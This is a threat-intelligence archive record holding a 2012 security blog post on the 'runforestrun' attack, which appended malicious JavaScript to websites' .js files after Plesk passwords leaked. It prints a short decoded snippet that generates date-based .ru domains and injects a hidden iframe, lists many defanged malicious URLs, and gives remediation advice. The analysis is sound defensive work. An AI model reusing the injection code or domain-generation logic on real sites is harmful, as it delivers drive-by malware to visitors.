{
	"id": "87725d36-8c66-4858-ad84-68d0bcd0099e",
	"created_at": "2026-04-06T00:12:43.167213Z",
	"updated_at": "2026-04-10T03:26:19.306485Z",
	"deleted_at": null,
	"sha1_hash": "fc66447363ce63032aab95f8b971eec5a3c7812d",
	"title": "Runforestrun and Pseudo Random Domains",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 131497,
	"plain_text": "Runforestrun and Pseudo Random Domains\r\nArchived: 2026-04-05 13:30:54 UTC\r\nToday I came across an interesting attack that injects malicious scripts at the very bottom of existing .js files.\r\nUpdate: at the bottom of this post you’ll find information about how a security hole in Plesk Panel was used to\r\ninfect websites. Comments are also worth reading.\r\nUpdate (July 26, 2012): The attack has changed both the injected script and the domain generating algorithm. See\r\ndetails in my follow up article. Information about the Plesk security issues are still can be found in the current\r\npost and comments.\r\nThe script (surrounded by the /*km0ae9gr6m*/…/*qhk6sa6g1c*/ pair of comments ) looks like this:\r\nFull source code can be found here\r\nOn Google diagnostic pages of infected sites you will currently see something like this\r\nMalicious software is hosted on 2 domain(s), including ctonxidjqijsnzny .ru/, znycugibimtvplve .ru/.\r\nI say “currently”, because the most interesting thing about this script is the built-in domain name generator.\r\nIf you decode the script (see the code), you will see functions with names like nextRandomNumber,\r\nRandomNumberGenerator, createRandomNumber and generatePseudoRandomString and the iframe URL\r\ngeneration based on the current date and time:\r\nvar unix = Math.round(+new Date() / 1000);\r\nvar domainName = generatePseudoRandomString(unix, 16, 'ru');\r\nifrm = document.createElement(\"IFRAME\");\r\nifrm.setAttribute(\"src\", \"http://\" + domainName + \"/runforestrun?sid=cx\");\r\nIt’s not a new tactic to use pseudo random domain name generators for drive by download attacks. I have already\r\ndescribed algorithms based on quite unpredictable factors such as Twitter trending topics. Attackers had only a\r\nhttps://web.archive.org/web/20150613014503/https://blog.unmaskparasites.com/2012/06/22/runforestrun-and-pseudo-random-domains/\r\nPage 1 of 8\n\nfew hours to a couple of days to register and properly configure new domains before malicious script would begin\r\nsending traffic to them.\r\nUnlike that Twitter-based algorithm, this new attack has a really dumb pseudo random string generator. It’s based\r\non such a predictable factor as a current data and time (before noon or after noon). It generates new domain names\r\nevery 12 hours.\r\nPredicted malicious URLs and sink holes\r\nNo wonder, it only took a couple of minutes to write a simple script that predicts URLs of the malicious iframes\r\nthat this attack will use by the end of summer of 2012. Then a quick check showed that 89 of the domain names\r\n(up to August 7th, 2012) are already registered and point to 95.211.27.206. When I try to open the predicted\r\nmalicious URLs I see the “domain suspended due to abuse reports” message. It looks like someone has already\r\ntaken care of this attack and sink-holed its domain names.\r\nOr is it a just trick that attackers use to make me think that there is nothing to worry about? It looks quite\r\nsuspicious that 95.211.27.206 is on Leaseweb (cybercriminals like to use this hosting provider), and nameservers\r\nhave Russian names “evilstalin.compress.to” and “smolny.compress.to“. At the same time all domains are\r\nregistered by a “Private Person” using a Russian registrar NAUNET that is known for being loyal to spammers\r\nand other cybercryminals. The WHOIS information and IP addresses for domains registered before the beginning\r\nof the attack (on June 8th) are the same as for domain names that had been registered just yesterday — this means\r\nthat they all have been registered by the attackers.\r\nAnd if you read comments to the following reddit thread, you will see that some people get the “domain\r\nsuspended due to abuse” message while others get redirected to “hxxp://db8237d82bdu .ipq .co/feed/xml.php?\r\nuid=12” and “hxxp://masvip .ru/6662/take.html“, which suggests that there is some server-side logic that filters\r\ntraffic (probably by IP, Referrer , etc.)\r\nUpdate (June 28, 2012): Today I saw myself how the “hxxp://gytcnulxsxpsqkfn .ru/runforestrun?sid=cx” URL\r\nreturned 302 redirect to “hxxp://insurancecentre .ru/in.cgi?7“,  which in turn redirected to “hxxp://freshtds\r\n.eu/default.cgi“.\r\nAnd what do you think? Are these domains sink-holed or they only pretend to be sink-holed?\r\nBy the way, here’s my list of the predicted malicious URLs.\r\nUpdate (July 6, 2012): At this point I see that predicted domain names are already registered through September\r\n7th, 2012, so I genarated a new list (up to October 9th) and put it here: http://pastebin.com/iZWFrDPC\r\nUpdate (July 26, 2012): The attack has changed both the injected script and the domain generating algorithm. See\r\ndetails in my follow up article.\r\nhxxp://xmexlajhysktwdqe .ru/runforestrun?sid=cx\r\nhxxp://atsihkcljrqlzvku .ru/runforestrun?sid=cx\r\nhxxp://kahmnunornwrgpgb .ru/runforestrun?sid=cx\r\nhxxp://mfwqdxgdpwiojrjp .ru/runforestrun?sid=cx\r\nhttps://web.archive.org/web/20150613014503/https://blog.unmaskparasites.com/2012/06/22/runforestrun-and-pseudo-random-domains/\r\nPage 2 of 8\n\nhxxp://wmiudbgrcvapriql .ru/runforestrun?sid=cx\r\nhxxp://yrxysfyekjfooere .ru/runforestrun?sid=cx\r\nhxxp://jzkitejvrxgkgpgi .ru/runforestrun?sid=cx\r\nhxxp://lfbovcaitdrjmkbe .ru/runforestrun?sid=cx\r\nhxxp://ulnrpbudycxzdlkt .ru/runforestrun?sid=cx\r\nhxxp://xqcwfwfphwoieuny .ru/runforestrun?sid=cx\r\nhxxp://hyoflopkupjioiqq .ru/runforestrun?sid=cx\r\nhxxp://keglxucgvwhqttmi .ru/runforestrun?sid=cx\r\nhxxp://tlrnhskrgijhwtlj .ru/runforestrun?sid=cx\r\nhxxp://vqhtwlshzzqsltcp .ru/runforestrun?sid=cx\r\nhxxp://gytcnulxsxpsqkfn .ru/runforestrun?sid=cx\r\nhxxp://iekiyvsbtyozmmwy .ru/runforestrun?sid=cx\r\nhxxp://dernflilrdxmfnye .ru/runforestrun?sid=cx\r\nhxxp://fjgtmicxtlxynlpf .ru/runforestrun?sid=cx\r\nhxxp://ppsvcvrcgkllplyn .ru/runforestrun?sid=cx\r\nhxxp://ruhctasjmpqbyvhm .ru/runforestrun?sid=cx\r\nhxxp://bdvkpbuldslsapeb .ru/runforestrun?sid=cx\r\nhxxp://eilqnjkoytyjuchn .ru/runforestrun?sid=cx\r\nhxxp://npxsiiwpxqqiihmo .ru/runforestrun?sid=cx\r\nhxxp://qtmyeslmsoxkjbku .ru/runforestrun?sid=cx\r\nhxxp://adbjjkquyyhyqknf .ru/runforestrun?sid=cx\r\nhxxp://ciqmhuwgvfsxdtrw .ru/runforestrun?sid=cx\r\nhxxp://mocrafrewsdjztbj .ru/runforestrun?sid=cx\r\nhxxp://otruvbidvikzhlop .ru/runforestrun?sid=cx\r\nhxxp://yafzvancybuwmnno .ru/runforestrun?sid=cx\r\nhxxp://bhujzorkulhkpwob .ru/runforestrun?sid=cx\r\nhxxp://lohnrnnpvvtxedfl .ru/runforestrun?sid=cx\r\nhxxp://ntvrnrdpyoadopbo .ru/runforestrun?sid=cx\r\nhxxp://wakvnkyzkyietkdr .ru/runforestrun?sid=cx\r\nhxxp://zfyafrjmmajqfvbh .ru/runforestrun?sid=cx\r\nhxxp://jnlkttkruqsdjqlx .ru/runforestrun?sid=cx\r\nhxxp://lsbppxhgckolsnap .ru/runforestrun?sid=cx\r\nhxxp://vznrahwzgntmfcqk .ru/runforestrun?sid=cx\r\nhxxp://xeeypppxswpquvrf .ru/runforestrun?sid=cx\r\nhxxp://inqgvoeohpcsfxmn .ru/runforestrun?sid=cx\r\nhxxp://ksgmckchdppqeicu .ru/runforestrun?sid=cx\r\nhxxp://uyrorwlibbjeasoq .ru/runforestrun?sid=cx\r\nhxxp://wejungvnykczyjam .ru/runforestrun?sid=cx\r\nhxxp://gmvdnpqbblixlgxj .ru/runforestrun?sid=cx\r\nhxxp://jrkjelzwleadyxsd .ru/runforestrun?sid=cx\r\nhxxp://sywleisrsstsqoic .ru/runforestrun?sid=cx\r\nhxxp://venrfhmthwpqlqge .ru/runforestrun?sid=cx\r\nhttps://web.archive.org/web/20150613014503/https://blog.unmaskparasites.com/2012/06/22/runforestrun-and-pseudo-random-domains/\r\nPage 3 of 8\n\nhxxp://fmacqvmqafqwmebl .ru/runforestrun?sid=cx\r\nhxxp://hrpgglxvqwjesffr .ru/runforestrun?sid=cx\r\nhxxp://rxbkqfydlnzopqrn .ru/runforestrun?sid=cx\r\nhxxp://tdsorylshsxjeawf .ru/runforestrun?sid=cx\r\nhxxp://elfxqghdubihhsgd .ru/runforestrun?sid=cx\r\nhxxp://gqtcxunxhyujqjkf .ru/runforestrun?sid=cx\r\nhxxp://qxggipnnfmnihkic .ru/runforestrun?sid=cx\r\nhxxp://sdxkjaophbtufumx .ru/runforestrun?sid=cx\r\nhxxp://clkujrjqvexvbmoi .ru/runforestrun?sid=cx\r\nhxxp://fqyyxagzkrpvxtki .ru/runforestrun?sid=cx\r\nhxxp://owldagkyzrkhqnjo .ru/runforestrun?sid=cx\r\nhxxp://rccjvgsgffokiwze .ru/runforestrun?sid=cx\r\nhxxp://blorcdyiipxcwyxv .ru/runforestrun?sid=cx\r\nhxxp://dpewaddpoewiycnj .ru/runforestrun?sid=cx\r\nhxxp://nwpykqeizraqthry .ru/runforestrun?sid=cx\r\nhxxp://pchgijctfprxhnje .ru/runforestrun?sid=cx\r\nhxxp://zisiiogqigzzqqeq .ru/runforestrun?sid=cx\r\nhxxp://cpittmwbqtjrjpql .ru/runforestrun?sid=cx\r\nhxxp://mvuvchtcxxibeubd .ru/runforestrun?sid=cx\r\nhxxp://oblcasnhxbbocpfj .ru/runforestrun?sid=cx\r\nhxxp://xixftoplsduqqorx .ru/runforestrun?sid=cx\r\nhxxp://bpnqmxkpxxgbdnby .ru/runforestrun?sid=cx\r\nhxxp://kvzstpqmeoxtcwko .ru/runforestrun?sid=cx\r\nhxxp://nbqypqrjiqxlfvdj .ru/runforestrun?sid=cx\r\nhxxp://whddmvrxufbkkoew .ru/runforestrun?sid=cx\r\nhxxp://ymrhcvphevonympo .ru/runforestrun?sid=cx\r\nhxxp://jveqgnmjxkocqifr .ru/runforestrun?sid=cx\r\nhxxp://lavvckpordclbduy .ru/runforestrun?sid=cx\r\nhxxp://vhhzcvbegxbjsxke .ru/runforestrun?sid=cx\r\nhxxp://xmwettbvtbhvrjuo .ru/runforestrun?sid=cx\r\nhxxp://gacdiuwnhonuulpe .ru/runforestrun?sid=cx 95.211.27.206\r\nhxxp://ifrhgnqeeotnzrmz .ru/runforestrun?sid=cx\r\nhxxp://rmdlgyreitjsjkfq .ru/runforestrun?sid=cx\r\nhxxp://uqspvdwyltgcyhft .ru/runforestrun?sid=cx\r\nhxxp://ezfydrexncoidbus .ru/runforestrun?sid=cx\r\nhxxp://hfveiooumeyrpchg .ru/runforestrun?sid=cx\r\nhxxp://qlihxnncwioxkdls .ru/runforestrun?sid=cx 95.211.27.206\r\nhxxp://sqwlonyduvpowdgy .ru/runforestrun?sid=cx\r\nhxxp://dyjvewshptsboygd .ru/runforestrun?sid=cx\r\nhxxp://febcbuyswmishvpl .ru/runforestrun?sid=cx\r\nhxxp://plmekaayiholtevt .ru/runforestrun?sid=cx\r\nhxxp://rpckbgrziwbdrmhr .ru/runforestrun?sid=cx\r\nhttps://web.archive.org/web/20150613014503/https://blog.unmaskparasites.com/2012/06/22/runforestrun-and-pseudo-random-domains/\r\nPage 4 of 8\n\nhxxp://cyosongjihugkjbg .ru/runforestrun?sid=cx Aug 7.\r\nhxxp://eefysywrvkgxuqdf .ru/runforestrun?sid=cx\r\nhxxp://nkrbvqxzfwicmhwb .ru/runforestrun?sid=cx\r\nhxxp://qphhsudsmeftdaht .ru/runforestrun?sid=cx\r\nhxxp://axtopsbtntqnfdyk .ru/runforestrun?sid=cx\r\nhxxp://ddkudnuklgiwtdyw .ru/runforestrun?sid=cx\r\nhxxp://mkwwclogcvgeekws .ru/runforestrun?sid=cx\r\nhxxp://opldkflyvlkywuec .ru/runforestrun?sid=cx\r\nhxxp://yvxfekhokspfuwqr .ru/runforestrun?sid=cx\r\nhxxp://bdprvpxdejpohqpt .ru/runforestrun?sid=cx\r\nhxxp://ljbvfrsvcevyfhor .ru/runforestrun?sid=cx\r\nhxxp://noqzuukouyfuyrmd .ru/runforestrun?sid=cx\r\nhxxp://xvcewyydwsmdgaju .ru/runforestrun?sid=cx\r\nhxxp://zatiscwwtipqlycd .ru/runforestrun?sid=cx\r\nhxxp://jjgshrjdcynohyuk .ru/runforestrun?sid=cx\r\nhxxp://mouwwvcwwlilnxub .ru/runforestrun?sid=cx\r\nhxxp://vuhaojpwxgsxuitu .ru/runforestrun?sid=cx\r\nhxxp://yayfefhrwawquwcw .ru/runforestrun?sid=cx\r\nhxxp://iiloishkjwvqldlq .ru/runforestrun?sid=cx\r\nhxxp://knauycqgsdhgbwjo .ru/runforestrun?sid=cx\r\nhxxp://uumwyzhctrwdsrdp .ru/runforestrun?sid=cx\r\nhxxp://wzbdwenwshfzglwt .ru/runforestrun?sid=cx\r\nhxxp://hiplksflttfkpsxn .ru/runforestrun?sid=cx\r\nhxxp://jnfrqmekhoevppvw .ru/runforestrun?sid=cx\r\nhxxp://ttqtkmthptxvwiku .ru/runforestrun?sid=cx\r\nhxxp://vygzhvfiuommkqfj .ru/runforestrun?sid=cx\r\nhxxp://fhuidtlqttqxgjvn .ru/runforestrun?sid=cx\r\nhxxp://imjosxuhbcdonrco .ru/runforestrun?sid=cx\r\nhxxp://rtvqcdpbqxgwnrcn .ru/runforestrun?sid=cx\r\nhxxp://tykvyflnjhbnqpnr .ru/runforestrun?sid=cx\r\nhxxp://ehyewyqydfpidbdp .ru/runforestrun?sid=cx\r\nhxxp://gmokuosvnbkshdtd .ru/runforestrun?sid=cx\r\nhxxp://qsbourrdxgxgwepy .ru/runforestrun?sid=cx\r\nhxxp://sxpskxdgoczvcjgp .ru/runforestrun?sid=cx\r\nhxxp://dhedppigtpbwrmpc .ru/runforestrun?sid=cx\r\nhxxp://flthmyjeuhdygshf .ru/runforestrun?sid=cx\r\nhxxp://osflhkaowydftniw .ru/runforestrun?sid=cx\r\nhxxp://rxupwhkznihnxzqx .ru/runforestrun?sid=cx\r\nhxxp://bgjzhlasdrwwnenj .ru/runforestrun?sid=cx\r\nhxxp://elxegvkalqvkyoxc .ru/runforestrun?sid=cx\r\nhxxp://nrkhysgoltauclop .ru/runforestrun?sid=cx\r\nhxxp://pwyloytoagndnrex .ru/runforestrun?sid=cx\r\nhttps://web.archive.org/web/20150613014503/https://blog.unmaskparasites.com/2012/06/22/runforestrun-and-pseudo-random-domains/\r\nPage 5 of 8\n\nhxxp://zenquqdskekaudbe .ru/runforestrun?sid=cx\r\nhxxp://cldcrgtnuwvgnbfd .ru/runforestrun?sid=cx\r\nhxxp://mroeqjdaukskbgua .ru/runforestrun?sid=cx\r\nhxxp://owekhoeuhmdiehrw .ru/runforestrun?sid=cx\r\nhxxp://ydrngsmrdiiyvoiy .ru/runforestrun?sid=cx\r\nhxxp://bkhyiqitpoxewhmt .ru/runforestrun?sid=cx\r\nWhat’s the security hole?\r\nAnother important questions is how all those legitimate sites had been compromised in the first place.\r\nAt this point I haven’t had a chance to work directly with infected sites and check what’s going on inside. So I\r\nhave to resort to analysis of factors that I can see from outside. I checked about a dozen of infected sites and they\r\nall use different web technologies from ASP.NET to pure HTML. They are all on different web servers: IIS,\r\nLitespeed, Apache. The only common link I can see is Plesk. When I check other sites on the same IP addresses I\r\nusually find a few more infected site (not all though). So could this be some security hole in Plesk that made this\r\nattack possible. What do you think?\r\nUpdate (June 23, 2012): Thanks to everyone who left comments. The problem seems to be really in Plesk. Axel\r\nfound traces of the attack in Plesk access logs. The attacker logged in and used file manager’s editor to modify .js\r\nfiles. Axel blames the Plesk vulnerability (versions before 10.4 are affected) found earlier this year and suggests\r\nthat server admins fix it: http://kb.parallels.com/en/113321 and reset passwords for all plesk accounts:\r\nSo if you are affected, then immediately change passwords of ALL Plesk accounts. This means: Plesk-admin-user, all reseller-accounts, all domain-administrators, FTP users of subdomains and web users of\r\ndomains. And of course, if not previously done, update your Plesk installation!!\r\nHere’s one more usefull link for server admins: How to make sure your Plesk Panel 8.x, 9.x, 10.0, 10.1, 10.2, or\r\n10.3 is not vulnerable\r\nTo webmasters: If your site is affected by this hack, contact your hosting provider ASAP and show them this\r\npost. Change your account passwords. And if your host resets your passwords there is a good reason for that.\r\nDon’t change your passwords back to your old ones!\r\nUpdate 2 (June 25, 2012): To find out more about this problem, I asked Axel a few questions and he agreed to\r\nexplain what’s going on:\r\nIt is important to distinguish between the attack and the security hole. The attack was not carried out\r\ndirectly by a security hole, but by means of a valid username/password combination.\r\nThe attacker used the built-in Plesk File Manager to replace files, so there are no entries in other log\r\nfiles (such as FTP-log -\u003e Shafiq’s comment). And there were a number of files changed with the same\r\njavascript code at a time. As you can see in the log-excerpt, there were 3 replacements:\r\njavascript_a1cb3a5978.js / jquery.min.js / easySlider1.7.js\r\nhttps://web.archive.org/web/20150613014503/https://blog.unmaskparasites.com/2012/06/22/runforestrun-and-pseudo-random-domains/\r\nPage 6 of 8\n\nThis file selection has been very well analyzed (no TYPO3 standard files), so it is also clear that it was\r\nnot an automated attack, but was executed by a human. By the way: the origin of my attack was another\r\ncompromised server from Germany.\r\nHowever, the real problem was/is the Plesk vulnerability (http://kb.parallels.com/en/113321). Many\r\nadmins do not realize that their passwords have been spied out weeks or months ago. To make it more\r\nclear: Due to the Plesk vulnerability database tables could be read. And unfortunately all Passwords in\r\nPlesk are stored in plain text!! Take a look in database ‘psa‘ at table ‘accounts‘ (and better sit down\r\nbefore doing that!). That’s why it is so important to change ALL passwords.\r\nJust fixing this vulnerability AFTER the server has been compromised, without changing ALL\r\npasswords, leave valid username/password combinations! So the attacker can come back after weeks or\r\nmonths and attack even in the meantime updated Plesk systems!!!\r\nHow can one find out whether the server has been compromised (weeks ago)? This is actually very\r\ndifficult. For me it works to look at the Plesk Action Log: There were times were I detect many VALID\r\naccount logins from different IPs in a very short time. This can’t be real and seems to be a kind of\r\nautomated control of the captured login data. A very clear sign of the attack :-(\r\nPlesk Action Log excerpt:\r\n46.10.200.000 site1 [2012-02-16 17:11:47] 'CP User Login' ('Contact Name': ''=\u003e\r\n'xxxxxxxxx')\r\n187.20.211.000 site2 [2012-02-16 17:11:47] 'CP User Login' ('Contact Name': ''=\u003e\r\n'xxxxxxxxx')\r\n118.71.113.000 site3 [2012-02-16 17:11:48] 'CP User Login' ('Contact Name': ''=\u003e\r\n'xxxxxxxxx')\r\n94.189.172.000 site4 [2012-02-16 17:11:49] 'CP User Login' ('Contact Name': ''=\u003e\r\n'xxxxxxxxx')\r\n86.194.202.000 site5 [2012-02-16 17:11:54] 'CP User Login' ('Contact Name': ''=\u003e\r\n'xxxxxxxxx')\r\n190.145.1.000 site6 [2012-02-16 17:11:55] 'CP User Login' ('Contact Name': ''=\u003e 'xxxxxxxxx')\r\n94.156.241.00 site7 [2012-02-16 17:11:56] 'CP User Login' ('Contact Name': ''=\u003e 'xxxxxxxxx')\r\n83.29.250.00 site8 [2012-02-16 17:11:58] 'CP User Login' ('Contact Name': ''=\u003e 'xxxxxxxxx')\r\n...\r\n99.238.82.000 site5 [2012-02-19 00:04:05] 'CP User Login' ('Contact Name': ''=\u003e 'xxxxxxxxx')\r\n93.194.210.00 site4 [2012-02-19 00:04:05] 'CP User Login' ('Contact Name': ''=\u003e 'xxxxxxxxx')\r\n213.37.176.000 site3 [2012-02-19 00:04:05] 'CP User Login' ('Contact Name': ''=\u003e\r\n'xxxxxxxxx')\r\n175.108.102.000 site1 [2012-02-19 00:04:06] 'CP User Login' ('Contact Name': '' =\u003e\r\n'xxxxxxxxx')\r\n180.220.149.000 site7 [2012-02-19 00:04:09] 'CP User Login' ('Contact Name': '' =\u003e\r\n'xxxxxxxxx')\r\n196.221.180.000 site8 [2012-02-19 00:04:09] 'CP User Login' ('Contact Name': '' =\u003e\r\nhttps://web.archive.org/web/20150613014503/https://blog.unmaskparasites.com/2012/06/22/runforestrun-and-pseudo-random-domains/\r\nPage 7 of 8\n\n'xxxxxxxxx')\r\n99.238.82.000 site5 [2012-02-19 00:04:13] 'CP User Logout' ('Contact Name': 'xxxxxxxxx' =\u003e\r\n'')\r\nI hope this helps\r\nAxel\r\n…\r\nUpdate (July 8, 2012): Here’s an interesting thread on the Parallels forum where server admins say that they\r\napplied security patches and reset passwords but their servers were re-infected shortly after that. Anyone has a\r\nproven solution to permanently fix this issue without breaking the File Manager (as suggested in the following\r\ncomment)?\r\nA few more questions to admins of affected server. Especially if your servers got reinfected after changing\r\npasswords and applying security patches.\r\n1. Did you consider use of backdoors? Did you search for backdoors?\r\n2. Did you consider scenario where hackers created some rogue users on your server? Maybe even an extra\r\nadmin user? Did you try to search  for users with suspicious activity or with excessive permissions?\r\nBy the way, the rumor has it that on hacker forums, someone offers an exploit (quite expensive) for Plesk \u003c=10.4\r\nthat allows to obtain admin password and remotely execute code on server (looks like it’s for Windows servers\r\nonly).\r\nUpdate (July 15, 2012): Parallels has just released the “Big” Security Update for Plesk v8-10 (all OS) and Plesk\r\n11 (Windows only). They don’t disclose details but mention that the security issue is “critical” and they found it\r\nduring internal testing. Not sure whether it can fix this current issue but it is definitely something administrators of\r\nservers with Plesk Panel should do. (And then comment whether it helped or not)\r\n##\r\nYour thoughts and comments are highly appreciated.\r\nRelated posts:\r\nRunForestRun Now Encrypts Legitimate JS Files\r\nMillions of Website Passwords Stored in Plain Text in Plesk Panel\r\nLorem Ipsum and Twitter Trends in Malware\r\nHackers Use Twitter API To Trigger Malicious Scripts\r\nIntroduction to Website Parasites\r\nSource: https://web.archive.org/web/20150613014503/https://blog.unmaskparasites.com/2012/06/22/runforestrun-and-pseudo-random-domain\r\ns/\r\nhttps://web.archive.org/web/20150613014503/https://blog.unmaskparasites.com/2012/06/22/runforestrun-and-pseudo-random-domains/\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://web.archive.org/web/20150613014503/https://blog.unmaskparasites.com/2012/06/22/runforestrun-and-pseudo-random-domains/"
	],
	"report_names": [
		"runforestrun-and-pseudo-random-domains"
	],
	"threat_actors": [
		{
			"id": "3fad11c6-4336-4b28-a606-f510eca5452e",
			"created_at": "2022-10-25T16:07:24.346573Z",
			"updated_at": "2026-04-10T02:00:04.948823Z",
			"deleted_at": null,
			"main_name": "Turbine Panda",
			"aliases": [
				"APT 26",
				"Black Vine",
				"Bronze Express",
				"Group 13",
				"JerseyMikes",
				"KungFu Kittens",
				"PinkPanther",
				"Shell Crew",
				"Taffeta Typhoon",
				"Turbine Panda",
				"WebMasters"
			],
			"source_name": "ETDA:Turbine Panda",
			"tools": [
				"Agent.dhwf",
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Derusbi",
				"Destroy RAT",
				"DestroyRAT",
				"FF-RAT",
				"FormerFirstRAT",
				"Hurix",
				"Kaba",
				"Korplug",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mivast",
				"PlugX",
				"RbDoor",
				"RedDelta",
				"RibDoor",
				"Sakula",
				"Sakula RAT",
				"Sakurel",
				"Sogu",
				"StreamEx",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Winnti",
				"Xamtrav",
				"cobeacon",
				"ffrat"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434363,
	"ts_updated_at": 1775791579,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fc66447363ce63032aab95f8b971eec5a3c7812d.pdf",
		"text": "https://archive.orkl.eu/fc66447363ce63032aab95f8b971eec5a3c7812d.txt",
		"img": "https://archive.orkl.eu/fc66447363ce63032aab95f8b971eec5a3c7812d.jpg"
	}
}